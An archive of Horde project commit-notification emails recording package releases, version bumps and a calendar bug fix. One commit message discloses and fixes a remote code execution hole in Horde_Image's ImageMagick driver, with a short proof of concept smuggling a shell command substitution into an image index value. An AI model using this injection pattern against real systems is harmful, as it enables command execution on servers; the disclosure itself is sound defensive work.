Subject: [commits] Horde annotated tag horde_service_facebook-2.0.10
	created. 1dd8a8c48e79a56a89bb354327c4df1363a94199
Message-ID: <20170919121342.1A160100A27@spencer.horde.org>

The annotated tag "horde_service_facebook-2.0.10" has been created.
        at  1dd8a8c48e79a56a89bb354327c4df1363a94199 (tag)
   tagging  bc8f3c3a0aeb24a226dff05154018af0778ba0f6 (commit)
  replaces  horde_scribe-2.0.3
 tagged by  Jan Schneider
        on  Tue Sep 19 13:04:08 2017 +0200

-----------------------------------------------------------------------
Released Horde_Service_Facebook-2.0.10.

Jan Schneider (2):
      Development mode for Horde_Scribe-2.0.4
      Released Horde_Service_Facebook-2.0.10



From jan at horde.org  Tue Sep 19 12:13:45 2017
From: jan at horde.org (Jan Schneider)
Date: Tue, 19 Sep 2017 14:13:45 +0200 (CEST)
Subject: [commits] Horde annotated tag horde_service_twitter-2.1.6 created.
	d9aba9167355fbf2f367748e30ba620fb2336521
Message-ID: <20170919121345.BCDCD100AAE@spencer.horde.org>

The annotated tag "horde_service_twitter-2.1.6" has been created.
        at  d9aba9167355fbf2f367748e30ba620fb2336521 (tag)
   tagging  4666299dabf35c395fa4019723803d42bf2d427f (commit)
  replaces  horde_service_facebook-2.0.10
 tagged by  Jan Schneider
        on  Tue Sep 19 13:10:13 2017 +0200

-----------------------------------------------------------------------
Released Horde_Service_Twitter-2.1.6.

Jan Schneider (2):
      Development mode for Horde_Service_Facebook-2.0.11
      Released Horde_Service_Twitter-2.1.6



From jan at horde.org  Tue Sep 19 12:13:49 2017
From: jan at horde.org (Jan Schneider)
Date: Tue, 19 Sep 2017 14:13:49 +0200 (CEST)
Subject: [commits] Horde annotated tag horde_service_urlshortener-2.0.3
	created. 766bcee669b8da479692e1573c4af9be7f8611d2
Message-ID: <20170919121349.70CC5100A27@spencer.horde.org>

The annotated tag "horde_service_urlshortener-2.0.3" has been created.
        at  766bcee669b8da479692e1573c4af9be7f8611d2 (tag)
   tagging  31c074e0ffd5f8d98f61bdb10c01bb0eb750af68 (commit)
  replaces  horde_service_twitter-2.1.6
 tagged by  Jan Schneider
        on  Tue Sep 19 13:47:11 2017 +0200

-----------------------------------------------------------------------
Released Horde_Service_UrlShortener-2.0.3.

Jan Schneider (2):
      Development mode for Horde_Service_Twitter-2.1.7
      Released Horde_Service_UrlShortener-2.0.3



From jan at horde.org  Tue Sep 19 12:13:53 2017
From: jan at horde.org (Jan Schneider)
Date: Tue, 19 Sep 2017 14:13:53 +0200 (CEST)
Subject: [commits] Horde annotated tag horde_stringprep-1.0.4 created.
	6fb300c2bf0041b570692166b5f5234a30c1f3b1
Message-ID: <20170919121353.3CDAC100AAE@spencer.horde.org>

The annotated tag "horde_stringprep-1.0.4" has been created.
        at  6fb300c2bf0041b570692166b5f5234a30c1f3b1 (tag)
   tagging  ae9ddbb1d825a908afe8e419c3864ceb220dedd9 (commit)
  replaces  horde_service_urlshortener-2.0.3
 tagged by  Jan Schneider
        on  Tue Sep 19 13:56:48 2017 +0200

-----------------------------------------------------------------------
Released Horde_Stringprep-1.0.4.

Jan Schneider (2):
      Development mode for Horde_Service_UrlShortener-2.0.4
      Released Horde_Stringprep-1.0.4



From jan at horde.org  Tue Sep 19 12:13:56 2017
From: jan at horde.org (Jan Schneider)
Date: Tue, 19 Sep 2017 14:13:56 +0200 (CEST)
Subject: [commits] Horde annotated tag horde_thrift-2.0.3 created.
	281d740210dcda9984840039657ad580d3aeb3f0
Message-ID: <20170919121356.ECEC2100A27@spencer.horde.org>

The annotated tag "horde_thrift-2.0.3" has been created.
        at  281d740210dcda9984840039657ad580d3aeb3f0 (tag)
   tagging  d16e70715efdfbe61b549ae2dcd21b6acb644589 (commit)
  replaces  horde_stringprep-1.0.4
 tagged by  Jan Schneider
        on  Tue Sep 19 14:02:53 2017 +0200

-----------------------------------------------------------------------
Released Horde_Thrift-2.0.3.

Jan Schneider (2):
      Development mode for Horde_Stringprep-1.0.5
      Released Horde_Thrift-2.0.3



From jan at horde.org  Tue Sep 19 12:14:00 2017
From: jan at horde.org (Jan Schneider)
Date: Tue, 19 Sep 2017 14:14:00 +0200 (CEST)
Subject: [commits] Horde annotated tag horde_tree-2.0.5 created.
	9fd8fe7ecc4a8e1c81addc7d8846f73e01e3ce1d
Message-ID: <20170919121400.9DFD1100AAE@spencer.horde.org>

The annotated tag "horde_tree-2.0.5" has been created.
        at  9fd8fe7ecc4a8e1c81addc7d8846f73e01e3ce1d (tag)
   tagging  b0dde7c94ee222c47b087959d9646f9b80eecee8 (commit)
  replaces  horde_thrift-2.0.3
 tagged by  Jan Schneider
        on  Tue Sep 19 14:10:53 2017 +0200

-----------------------------------------------------------------------
Released Horde_Tree-2.0.5.

Jan Schneider (2):
      Development mode for Horde_Thrift-2.0.4
      Released Horde_Tree-2.0.5



From jan at horde.org  Tue Sep 19 14:43:14 2017
From: jan at horde.org (Jan Schneider)
Date: Tue, 19 Sep 2017 16:43:14 +0200 (CEST)
Subject: [commits] Horde branch FRAMEWORK_5_2 updated.
	1ffa3a02624ba4f5d803643624da99c49664cf93
Message-ID: <20170919144315.4C353100A27@spencer.horde.org>

The branch "FRAMEWORK_5_2" has been updated.
The following is a summary of the commits.

from: 93a0ba74a3959ee2506ea856f0711775caf9c0ac

80d76cd Released horde-5.2.17
275e6a5 Development mode for horde-5.2.18
68661ec Released ansel-3.0.8
30c7af0 Development mode for ansel-3.0.9
3b2d189 Released imp-6.2.21
8e23b47 Development mode for imp-6.2.22
45ad938 Released ingo-3.2.16
436dd5b Development mode for ingo-3.2.17
0484ae8 Released timeobjects-2.1.4
2f9937c Development mode for timeobjects-2.1.5
d6df604 Released content-2.0.6
1ffa3a0 Development mode for content-2.0.7

Summary: http://github.com/horde/horde/compare/93a0ba74a3959ee2506ea856f0711775caf9c0ac...1ffa3a02624ba4f5d803643624da99c49664cf93

-----------------------------------------------------------------------

commit 80d76cdc361b650d9180488e75f598e780217c9a
Author: Jan Schneider 
Date:   Tue Sep 19 14:22:39 2017 +0200

    Released horde-5.2.17

 horde/composer.json       | 6 +++---
 horde/docs/CHANGES        | 6 +++---
 horde/lib/Application.php | 2 +-
 horde/package.xml         | 4 ++--
 4 files changed, 9 insertions(+), 9 deletions(-)

http://github.com/horde/horde/commit/80d76cdc361b650d9180488e75f598e780217c9a

-----------------------------------------------------------------------

commit 275e6a56245ae9a5b9e5b1111154ccbd49d8ef76
Author: Jan Schneider 
Date:   Tue Sep 19 14:22:41 2017 +0200

    Development mode for horde-5.2.18

 horde/docs/CHANGES        |  6 ++++++
 horde/lib/Application.php |  2 +-
 horde/package.xml         | 18 +++++++++++++++---
 3 files changed, 22 insertions(+), 4 deletions(-)

http://github.com/horde/horde/commit/275e6a56245ae9a5b9e5b1111154ccbd49d8ef76

-----------------------------------------------------------------------

commit 68661ec46f25444ff86f69c9db9eb5c3b8c5bdbb
Author: Jan Schneider 
Date:   Tue Sep 19 14:31:09 2017 +0200

    Released ansel-3.0.8

 ansel/composer.json       | 6 +++---
 ansel/docs/CHANGES        | 6 +++---
 ansel/lib/Application.php | 2 +-
 ansel/package.xml         | 4 ++--
 4 files changed, 9 insertions(+), 9 deletions(-)

http://github.com/horde/horde/commit/68661ec46f25444ff86f69c9db9eb5c3b8c5bdbb

-----------------------------------------------------------------------

commit 30c7af020459f6f4005fe0c17bbbf10a8c7a4e7e
Author: Jan Schneider 
Date:   Tue Sep 19 14:31:11 2017 +0200

    Development mode for ansel-3.0.9

 ansel/docs/CHANGES        |  6 ++++++
 ansel/lib/Application.php |  2 +-
 ansel/package.xml         | 17 +++++++++++++++--
 3 files changed, 22 insertions(+), 3 deletions(-)

http://github.com/horde/horde/commit/30c7af020459f6f4005fe0c17bbbf10a8c7a4e7e

-----------------------------------------------------------------------

commit 3b2d1895bdecf0b7210048bfd92d403c811ee876
Author: Jan Schneider 
Date:   Tue Sep 19 14:37:56 2017 +0200

    Released imp-6.2.21

 imp/composer.json       | 6 +++---
 imp/docs/CHANGES        | 6 +++---
 imp/lib/Application.php | 2 +-
 imp/package.xml         | 4 ++--
 4 files changed, 9 insertions(+), 9 deletions(-)

http://github.com/horde/horde/commit/3b2d1895bdecf0b7210048bfd92d403c811ee876

-----------------------------------------------------------------------

commit 8e23b478407e470145e7b738c7d5e42a39df1dde
Author: Jan Schneider 
Date:   Tue Sep 19 14:37:58 2017 +0200

    Development mode for imp-6.2.22

 imp/docs/CHANGES        |  6 ++++++
 imp/lib/Application.php |  2 +-
 imp/package.xml         | 17 +++++++++++++++--
 3 files changed, 22 insertions(+), 3 deletions(-)

http://github.com/horde/horde/commit/8e23b478407e470145e7b738c7d5e42a39df1dde

-----------------------------------------------------------------------

commit 45ad938a5c8589d29e7b24e4c72de2612c292819
Author: Jan Schneider 
Date:   Tue Sep 19 14:45:51 2017 +0200

    Released ingo-3.2.16

 ingo/composer.json       | 6 +++---
 ingo/docs/CHANGES        | 6 +++---
 ingo/lib/Application.php | 2 +-
 ingo/package.xml         | 4 ++--
 4 files changed, 9 insertions(+), 9 deletions(-)

http://github.com/horde/horde/commit/45ad938a5c8589d29e7b24e4c72de2612c292819

-----------------------------------------------------------------------

commit 436dd5b965dfc9cbc26740a134695e37b7369b4d
Author: Jan Schneider 
Date:   Tue Sep 19 14:45:54 2017 +0200

    Development mode for ingo-3.2.17

 ingo/docs/CHANGES        |  6 ++++++
 ingo/lib/Application.php |  2 +-
 ingo/package.xml         | 17 +++++++++++++++--
 3 files changed, 22 insertions(+), 3 deletions(-)

http://github.com/horde/horde/commit/436dd5b965dfc9cbc26740a134695e37b7369b4d

-----------------------------------------------------------------------

commit 0484ae89ee4a8ca701e5653cd05ce635c9b166d5
Author: Jan Schneider 
Date:   Tue Sep 19 14:54:40 2017 +0200

    Released timeobjects-2.1.4

 timeobjects/composer.json       | 29 +++++++++++++++++++----------
 timeobjects/docs/CHANGES        |  6 +++---
 timeobjects/lib/Application.php |  2 +-
 timeobjects/package.xml         |  4 ++--
 4 files changed, 25 insertions(+), 16 deletions(-)

http://github.com/horde/horde/commit/0484ae89ee4a8ca701e5653cd05ce635c9b166d5

-----------------------------------------------------------------------

commit 2f9937cc6a26dcefb357ba82d7984757936ce883
Author: Jan Schneider 
Date:   Tue Sep 19 14:54:42 2017 +0200

    Development mode for timeobjects-2.1.5

 timeobjects/docs/CHANGES        |  6 ++++++
 timeobjects/lib/Application.php |  2 +-
 timeobjects/package.xml         | 17 +++++++++++++++--
 3 files changed, 22 insertions(+), 3 deletions(-)

http://github.com/horde/horde/commit/2f9937cc6a26dcefb357ba82d7984757936ce883

-----------------------------------------------------------------------

commit d6df604e130a7a12bd7fe0cce5b5e5e7c2564eb2
Author: Jan Schneider 
Date:   Tue Sep 19 15:52:38 2017 +0200

    Released content-2.0.6

 content/composer.json       | 37 +++++++++++++++++++++++--------------
 content/docs/CHANGES        |  6 +++---
 content/lib/Application.php |  2 +-
 content/package.xml         |  4 ++--
 4 files changed, 29 insertions(+), 20 deletions(-)

http://github.com/horde/horde/commit/d6df604e130a7a12bd7fe0cce5b5e5e7c2564eb2

-----------------------------------------------------------------------

commit 1ffa3a02624ba4f5d803643624da99c49664cf93
Author: Jan Schneider 
Date:   Tue Sep 19 15:52:40 2017 +0200

    Development mode for content-2.0.7

 content/docs/CHANGES        |  6 ++++++
 content/lib/Application.php |  2 +-
 content/package.xml         | 17 +++++++++++++++--
 3 files changed, 22 insertions(+), 3 deletions(-)

http://github.com/horde/horde/commit/1ffa3a02624ba4f5d803643624da99c49664cf93



From jan at horde.org  Tue Sep 19 14:43:22 2017
From: jan at horde.org (Jan Schneider)
Date: Tue, 19 Sep 2017 16:43:22 +0200 (CEST)
Subject: [commits] Horde annotated tag ansel-3.0.8 created.
	5d0004a0d2e659cd57cad49c48df82d6b319f536
Message-ID: <20170919144322.8FB9E100A27@spencer.horde.org>

The annotated tag "ansel-3.0.8" has been created.
        at  5d0004a0d2e659cd57cad49c48df82d6b319f536 (tag)
   tagging  68661ec46f25444ff86f69c9db9eb5c3b8c5bdbb (commit)
  replaces  horde-5.2.17
 tagged by  Jan Schneider
        on  Tue Sep 19 14:31:09 2017 +0200

-----------------------------------------------------------------------
Released ansel-3.0.8.

Jan Schneider (2):
      Development mode for horde-5.2.18
      Released ansel-3.0.8



From jan at horde.org  Tue Sep 19 14:43:26 2017
From: jan at horde.org (Jan Schneider)
Date: Tue, 19 Sep 2017 16:43:26 +0200 (CEST)
Subject: [commits] Horde annotated tag content-2.0.6 created.
	ca5afa646f7bb4650dee59c60790768bf9550db8
Message-ID: <20170919144326.553F0100A27@spencer.horde.org>

The annotated tag "content-2.0.6" has been created.
        at  ca5afa646f7bb4650dee59c60790768bf9550db8 (tag)
   tagging  d6df604e130a7a12bd7fe0cce5b5e5e7c2564eb2 (commit)
  replaces  timeobjects-2.1.4
 tagged by  Jan Schneider
        on  Tue Sep 19 15:52:38 2017 +0200

-----------------------------------------------------------------------
Released content-2.0.6.

Jan Schneider (2):
      Development mode for timeobjects-2.1.5
      Released content-2.0.6



From jan at horde.org  Tue Sep 19 14:43:29 2017
From: jan at horde.org (Jan Schneider)
Date: Tue, 19 Sep 2017 16:43:29 +0200 (CEST)
Subject: [commits] Horde annotated tag horde-5.2.17 created.
	2d55c2cc7fd09106c7e8a1ef9010ee6b2ae03016
Message-ID: <20170919144330.1A9B4100A27@spencer.horde.org>

The annotated tag "horde-5.2.17" has been created.
        at  2d55c2cc7fd09106c7e8a1ef9010ee6b2ae03016 (tag)
   tagging  80d76cdc361b650d9180488e75f598e780217c9a (commit)
  replaces  wicked-2.0.8rc1
 tagged by  Jan Schneider
        on  Tue Sep 19 14:22:39 2017 +0200

-----------------------------------------------------------------------
Released horde-5.2.17.

Jan Schneider (3):
      Development mode for wicked-2.0.8RC2
      Prepare releases.
      Released horde-5.2.17



From jan at horde.org  Tue Sep 19 14:43:33 2017
From: jan at horde.org (Jan Schneider)
Date: Tue, 19 Sep 2017 16:43:33 +0200 (CEST)
Subject: [commits] Horde annotated tag imp-6.2.21 created.
	0ac45078d7f3f18958fb26c5119d9ac7b20776af
Message-ID: <20170919144333.CBCFB100A27@spencer.horde.org>

The annotated tag "imp-6.2.21" has been created.
        at  0ac45078d7f3f18958fb26c5119d9ac7b20776af (tag)
   tagging  3b2d1895bdecf0b7210048bfd92d403c811ee876 (commit)
  replaces  ansel-3.0.8
 tagged by  Jan Schneider
        on  Tue Sep 19 14:37:57 2017 +0200

-----------------------------------------------------------------------
Released imp-6.2.21.

Jan Schneider (2):
      Development mode for ansel-3.0.9
      Released imp-6.2.21



From jan at horde.org  Tue Sep 19 14:43:37 2017
From: jan at horde.org (Jan Schneider)
Date: Tue, 19 Sep 2017 16:43:37 +0200 (CEST)
Subject: [commits] Horde annotated tag ingo-3.2.16 created.
	37ebcb08737483f7207be58a0e8b1b7cd07b6125
Message-ID: <20170919144337.75AC8100A27@spencer.horde.org>

The annotated tag "ingo-3.2.16" has been created.
        at  37ebcb08737483f7207be58a0e8b1b7cd07b6125 (tag)
   tagging  45ad938a5c8589d29e7b24e4c72de2612c292819 (commit)
  replaces  imp-6.2.21
 tagged by  Jan Schneider
        on  Tue Sep 19 14:45:52 2017 +0200

-----------------------------------------------------------------------
Released ingo-3.2.16.

Jan Schneider (2):
      Development mode for imp-6.2.22
      Released ingo-3.2.16



From jan at horde.org  Tue Sep 19 14:43:41 2017
From: jan at horde.org (Jan Schneider)
Date: Tue, 19 Sep 2017 16:43:41 +0200 (CEST)
Subject: [commits] Horde annotated tag timeobjects-2.1.4 created.
	fe7139550f254d9327fb3f6872e066609dcfce8c
Message-ID: <20170919144341.33432100AAE@spencer.horde.org>

The annotated tag "timeobjects-2.1.4" has been created.
        at  fe7139550f254d9327fb3f6872e066609dcfce8c (tag)
   tagging  0484ae89ee4a8ca701e5653cd05ce635c9b166d5 (commit)
  replaces  ingo-3.2.16
 tagged by  Jan Schneider
        on  Tue Sep 19 14:54:40 2017 +0200

-----------------------------------------------------------------------
Released timeobjects-2.1.4.

Jan Schneider (2):
      Development mode for ingo-3.2.17
      Released timeobjects-2.1.4



From jan at horde.org  Tue Sep 19 15:01:13 2017
From: jan at horde.org (Jan Schneider)
Date: Tue, 19 Sep 2017 17:01:13 +0200 (CEST)
Subject: [commits] Horde branch FRAMEWORK_5_2 updated.
	72560bfc1e01282cec6e9c8fdbdebfbe39a5809f
Message-ID: <20170919150113.8E214100A27@spencer.horde.org>

The branch "FRAMEWORK_5_2" has been updated.
The following is a summary of the commits.

from: 1ffa3a02624ba4f5d803643624da99c49664cf93

72560bf Fix regression when exporting single tags to iCalendar CATEGORIES.

Summary: http://github.com/horde/horde/compare/1ffa3a02624ba4f5d803643624da99c49664cf93...72560bfc1e01282cec6e9c8fdbdebfbe39a5809f

-----------------------------------------------------------------------

commit 72560bfc1e01282cec6e9c8fdbdebfbe39a5809f
Author: Jan Schneider 
Date:   Tue Sep 19 17:00:59 2017 +0200

    Fix regression when exporting single tags to iCalendar CATEGORIES.

 kronolith/lib/Event.php | 6 +++++-
 nag/docs/CHANGES        | 1 +
 nag/lib/Task.php        | 6 +++++-
 nag/package.xml         | 2 ++
 4 files changed, 13 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/72560bfc1e01282cec6e9c8fdbdebfbe39a5809f



From jan at horde.org  Tue Sep 19 15:44:51 2017
From: jan at horde.org (Jan Schneider)
Date: Tue, 19 Sep 2017 17:44:51 +0200 (CEST)
Subject: [commits] Horde branch FRAMEWORK_5_2 updated.
	95508c3f6b382be1b56fb6312b9db55ffde3f244
Message-ID: <20170919154452.28F9B100A27@spencer.horde.org>

The branch "FRAMEWORK_5_2" has been updated.
The following is a summary of the commits.

from: 72560bfc1e01282cec6e9c8fdbdebfbe39a5809f

602b103 Released kronolith-4.2.23
e1042e8 Development mode for kronolith-4.2.24
0d1312b Released mnemo-4.2.14
e1379f7 Development mode for mnemo-4.2.15
2a8778d Released trean-1.1.9
565b770 Development mode for trean-1.1.10
a926786 Released turba-4.2.21
7605e7a Development mode for turba-4.2.22
510e72d Released whups-3.0.12
95508c3 Development mode for whups-3.0.13

Summary: http://github.com/horde/horde/compare/72560bfc1e01282cec6e9c8fdbdebfbe39a5809f...95508c3f6b382be1b56fb6312b9db55ffde3f244

-----------------------------------------------------------------------

commit 602b103833f73bb20389228af50da6b5540fc7d6
Author: Jan Schneider 
Date:   Tue Sep 19 17:08:27 2017 +0200

    Released kronolith-4.2.23

 kronolith/composer.json       | 8 ++++----
 kronolith/docs/CHANGES        | 6 +++---
 kronolith/lib/Application.php | 2 +-
 kronolith/package.xml         | 4 ++--
 4 files changed, 10 insertions(+), 10 deletions(-)

http://github.com/horde/horde/commit/602b103833f73bb20389228af50da6b5540fc7d6

-----------------------------------------------------------------------

commit e1042e8b5c9c96f4e6b34e6e6cde3ef8ad70addb
Author: Jan Schneider 
Date:   Tue Sep 19 17:08:29 2017 +0200

    Development mode for kronolith-4.2.24

 kronolith/docs/CHANGES        |  6 ++++++
 kronolith/lib/Application.php |  2 +-
 kronolith/package.xml         | 20 +++++++++++++++-----
 3 files changed, 22 insertions(+), 6 deletions(-)

http://github.com/horde/horde/commit/e1042e8b5c9c96f4e6b34e6e6cde3ef8ad70addb

-----------------------------------------------------------------------

commit 0d1312b18f5ef0b5cc26e3be55ee2bad783f28c5
Author: Jan Schneider 
Date:   Tue Sep 19 17:17:40 2017 +0200

    Released mnemo-4.2.14

 mnemo/composer.json       | 61 +++++++++++++++++++++++++++--------------------
 mnemo/docs/CHANGES        |  6 ++---
 mnemo/lib/Application.php |  2 +-
 mnemo/package.xml         |  4 ++--
 4 files changed, 41 insertions(+), 32 deletions(-)

http://github.com/horde/horde/commit/0d1312b18f5ef0b5cc26e3be55ee2bad783f28c5

-----------------------------------------------------------------------

commit e1379f7d4b869596ee1f28a81623f04307e7ccce
Author: Jan Schneider 
Date:   Tue Sep 19 17:17:42 2017 +0200

    Development mode for mnemo-4.2.15

 mnemo/docs/CHANGES        |  6 ++++++
 mnemo/lib/Application.php |  2 +-
 mnemo/package.xml         | 18 +++++++++++++++---
 3 files changed, 22 insertions(+), 4 deletions(-)

http://github.com/horde/horde/commit/e1379f7d4b869596ee1f28a81623f04307e7ccce

-----------------------------------------------------------------------

commit 2a8778d12d75a4414e04809e7e36408a69cf01e1
Author: Jan Schneider 
Date:   Tue Sep 19 17:24:44 2017 +0200

    Released trean-1.1.9

 trean/composer.json       | 6 +++---
 trean/docs/CHANGES        | 6 +++---
 trean/lib/Application.php | 2 +-
 trean/package.xml         | 4 ++--
 4 files changed, 9 insertions(+), 9 deletions(-)

http://github.com/horde/horde/commit/2a8778d12d75a4414e04809e7e36408a69cf01e1

-----------------------------------------------------------------------

commit 565b770c645b9972c2bc2912e3675f14eb4b68f7
Author: Jan Schneider 
Date:   Tue Sep 19 17:24:47 2017 +0200

    Development mode for trean-1.1.10

 trean/docs/CHANGES        |  6 ++++++
 trean/lib/Application.php |  2 +-
 trean/package.xml         | 17 +++++++++++++++--
 3 files changed, 22 insertions(+), 3 deletions(-)

http://github.com/horde/horde/commit/565b770c645b9972c2bc2912e3675f14eb4b68f7

-----------------------------------------------------------------------

commit a92678656646328315a2453e7327ea931d9354ab
Author: Jan Schneider 
Date:   Tue Sep 19 17:35:18 2017 +0200

    Released turba-4.2.21

 turba/composer.json       | 6 +++---
 turba/docs/CHANGES        | 6 +++---
 turba/lib/Application.php | 2 +-
 turba/package.xml         | 4 ++--
 4 files changed, 9 insertions(+), 9 deletions(-)

http://github.com/horde/horde/commit/a92678656646328315a2453e7327ea931d9354ab

-----------------------------------------------------------------------

commit 7605e7abcfdaa1e7e2463618133eef1a5fc57a9a
Author: Jan Schneider 
Date:   Tue Sep 19 17:35:20 2017 +0200

    Development mode for turba-4.2.22

 turba/docs/CHANGES        |  6 ++++++
 turba/lib/Application.php |  2 +-
 turba/package.xml         | 17 +++++++++++++++--
 3 files changed, 22 insertions(+), 3 deletions(-)

http://github.com/horde/horde/commit/7605e7abcfdaa1e7e2463618133eef1a5fc57a9a

-----------------------------------------------------------------------

commit 510e72d57b8ab059e6617f1fa957158114a7a725
Author: Jan Schneider 
Date:   Tue Sep 19 17:44:26 2017 +0200

    Released whups-3.0.12

 whups/composer.json       | 6 +++---
 whups/docs/CHANGES        | 6 +++---
 whups/lib/Application.php | 2 +-
 whups/package.xml         | 4 ++--
 4 files changed, 9 insertions(+), 9 deletions(-)

http://github.com/horde/horde/commit/510e72d57b8ab059e6617f1fa957158114a7a725

-----------------------------------------------------------------------

commit 95508c3f6b382be1b56fb6312b9db55ffde3f244
Author: Jan Schneider 
Date:   Tue Sep 19 17:44:27 2017 +0200

    Development mode for whups-3.0.13

 whups/docs/CHANGES        |  6 ++++++
 whups/lib/Application.php |  2 +-
 whups/package.xml         | 17 +++++++++++++++--
 3 files changed, 22 insertions(+), 3 deletions(-)

http://github.com/horde/horde/commit/95508c3f6b382be1b56fb6312b9db55ffde3f244



From jan at horde.org  Tue Sep 19 15:44:59 2017
From: jan at horde.org (Jan Schneider)
Date: Tue, 19 Sep 2017 17:44:59 +0200 (CEST)
Subject: [commits] Horde annotated tag kronolith-4.2.23 created.
	1ef7385ada52f6d24eac1c6ad5a82064d476b6bd
Message-ID: <20170919154459.4A270100A27@spencer.horde.org>

The annotated tag "kronolith-4.2.23" has been created.
        at  1ef7385ada52f6d24eac1c6ad5a82064d476b6bd (tag)
   tagging  602b103833f73bb20389228af50da6b5540fc7d6 (commit)
  replaces  content-2.0.6
 tagged by  Jan Schneider
        on  Tue Sep 19 17:08:27 2017 +0200

-----------------------------------------------------------------------
Released kronolith-4.2.23.

Jan Schneider (3):
      Development mode for content-2.0.7
      Fix regression when exporting single tags to iCalendar CATEGORIES.
      Released kronolith-4.2.23



From jan at horde.org  Tue Sep 19 15:45:05 2017
From: jan at horde.org (Jan Schneider)
Date: Tue, 19 Sep 2017 17:45:05 +0200 (CEST)
Subject: [commits] Horde annotated tag mnemo-4.2.14 created.
	08e619c8a30a1129670665afdbbebc72834d36f1
Message-ID: <20170919154505.6D184100A27@spencer.horde.org>

The annotated tag "mnemo-4.2.14" has been created.
        at  08e619c8a30a1129670665afdbbebc72834d36f1 (tag)
   tagging  0d1312b18f5ef0b5cc26e3be55ee2bad783f28c5 (commit)
  replaces  kronolith-4.2.23
 tagged by  Jan Schneider
        on  Tue Sep 19 17:17:40 2017 +0200

-----------------------------------------------------------------------
Released mnemo-4.2.14.

Jan Schneider (2):
      Development mode for kronolith-4.2.24
      Released mnemo-4.2.14



From jan at horde.org  Tue Sep 19 15:45:14 2017
From: jan at horde.org (Jan Schneider)
Date: Tue, 19 Sep 2017 17:45:14 +0200 (CEST)
Subject: [commits] Horde annotated tag turba-4.2.21 created.
	51adfa673e5ffcac47466cad0cba871546483c8d
Message-ID: <20170919154514.4C467100A27@spencer.horde.org>

The annotated tag "turba-4.2.21" has been created.
        at  51adfa673e5ffcac47466cad0cba871546483c8d (tag)
   tagging  a92678656646328315a2453e7327ea931d9354ab (commit)
  replaces  trean-1.1.9
 tagged by  Jan Schneider
        on  Tue Sep 19 17:35:18 2017 +0200

-----------------------------------------------------------------------
Released turba-4.2.21.

Jan Schneider (2):
      Development mode for trean-1.1.10
      Released turba-4.2.21



From jan at horde.org  Tue Sep 19 15:45:10 2017
From: jan at horde.org (Jan Schneider)
Date: Tue, 19 Sep 2017 17:45:10 +0200 (CEST)
Subject: [commits] Horde annotated tag trean-1.1.9 created.
	77692aa939ee59f3509c231f159d333e96b079a7
Message-ID: <20170919154510.83C13100A27@spencer.horde.org>

The annotated tag "trean-1.1.9" has been created.
        at  77692aa939ee59f3509c231f159d333e96b079a7 (tag)
   tagging  2a8778d12d75a4414e04809e7e36408a69cf01e1 (commit)
  replaces  mnemo-4.2.14
 tagged by  Jan Schneider
        on  Tue Sep 19 17:24:44 2017 +0200

-----------------------------------------------------------------------
Released trean-1.1.9.

Jan Schneider (2):
      Development mode for mnemo-4.2.15
      Released trean-1.1.9



From jan at horde.org  Tue Sep 19 15:45:17 2017
From: jan at horde.org (Jan Schneider)
Date: Tue, 19 Sep 2017 17:45:17 +0200 (CEST)
Subject: [commits] Horde annotated tag whups-3.0.12 created.
	a695782051c7c5911fb2bb68f85e72030bf22b92
Message-ID: <20170919154518.0DC70100A27@spencer.horde.org>

The annotated tag "whups-3.0.12" has been created.
        at  a695782051c7c5911fb2bb68f85e72030bf22b92 (tag)
   tagging  510e72d57b8ab059e6617f1fa957158114a7a725 (commit)
  replaces  turba-4.2.21
 tagged by  Jan Schneider
        on  Tue Sep 19 17:44:26 2017 +0200

-----------------------------------------------------------------------
Released whups-3.0.12.

Jan Schneider (2):
      Development mode for turba-4.2.22
      Released whups-3.0.12



From jan at horde.org  Tue Sep 19 16:06:22 2017
From: jan at horde.org (Jan Schneider)
Date: Tue, 19 Sep 2017 18:06:22 +0200 (CEST)
Subject: [commits] Horde branch master updated.
	3afdce9d40d8a0e5c30f711ddf7cb24850751e52
Message-ID: <20170919160623.0475A100A27@spencer.horde.org>

The branch "master" has been updated.
The following is a summary of the commits.

from: f7672ebc89530aa2f201b0f9bb66c9e7477e77b1

eb3afd1 Fix RCE in _raw() via $index parameter.
3afdce9 [jan] SECURITY: Fix remote code execution vulnerability in Im driver (Thomas Jarosch .

Summary: http://github.com/horde/horde/compare/f7672ebc89530aa2f201b0f9bb66c9e7477e77b1...3afdce9d40d8a0e5c30f711ddf7cb24850751e52

-----------------------------------------------------------------------

commit eb3afd14c22c77ae0d29e2848f5ac726ef6e7c5b
Author: Thomas Jarosch 
Date:   Fri Sep 15 15:45:55 2017 +0200

    Fix RCE in _raw() via $index parameter.
    
    $index is passed down from getImageAtIndex($index).
    Luckily the only official horde code calling it
    is the PDF preview code with a fixed index of 0.
    
    Still code from third party vendors using the Horde framework libs
    might expose getImageAtIndex() to the web.
    
    PoC:
    
    ----------------
     "5'$(ls -al )'");
    $max_pages = 10;
    
    // php fun: implicit conversion to integer
    if ($options['index'] < $max_pages)
    {
        // _raw() call in Im.php might look like
        //        /usr/bin/convert  "/tmp/img1URPsC"'[0]'  -strip png:"/tmp/img0NgHfI"
        echo exec('echo \'[' . $options['index'] . ']\' ');
    }
    ?>
    ----------------
    Signed-off-by: Thomas Jarosch 
    Signed-off-by: Jan Schneider 

 framework/Image/lib/Horde/Image/Im.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/eb3afd14c22c77ae0d29e2848f5ac726ef6e7c5b

-----------------------------------------------------------------------

commit 3afdce9d40d8a0e5c30f711ddf7cb24850751e52
Author: Jan Schneider 
Date:   Tue Sep 19 18:06:03 2017 +0200

    [jan] SECURITY: Fix remote code execution vulnerability in Im driver (Thomas Jarosch .

 framework/Image/package.xml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/3afdce9d40d8a0e5c30f711ddf7cb24850751e52



From jan at horde.org  Tue Sep 19 16:19:15 2017
From: jan at horde.org (Jan Schneider)
Date: Tue, 19 Sep 2017 18:19:15 +0200 (CEST)
Subject: [commits] Horde branch master updated.
	c905b2309528f2fe824f8e7fc739d941dfd6cea8
Message-ID: <20170919161915.E95FE100A27@spencer.horde.org>

The branch "master" has been updated.
The following is a summary of the commits.

from: 3afdce9d40d8a0e5c30f711ddf7cb24850751e52

8d72d7d Released Horde_Image-2.5.2
c905b23 Development mode for Horde_Image-2.5.3

Summary: http://github.com/horde/horde/compare/3afdce9d40d8a0e5c30f711ddf7cb24850751e52...c905b2309528f2fe824f8e7fc739d941dfd6cea8

-----------------------------------------------------------------------

commit 8d72d7d9624d67b735be295c2a687744049abe52
Author: Jan Schneider 
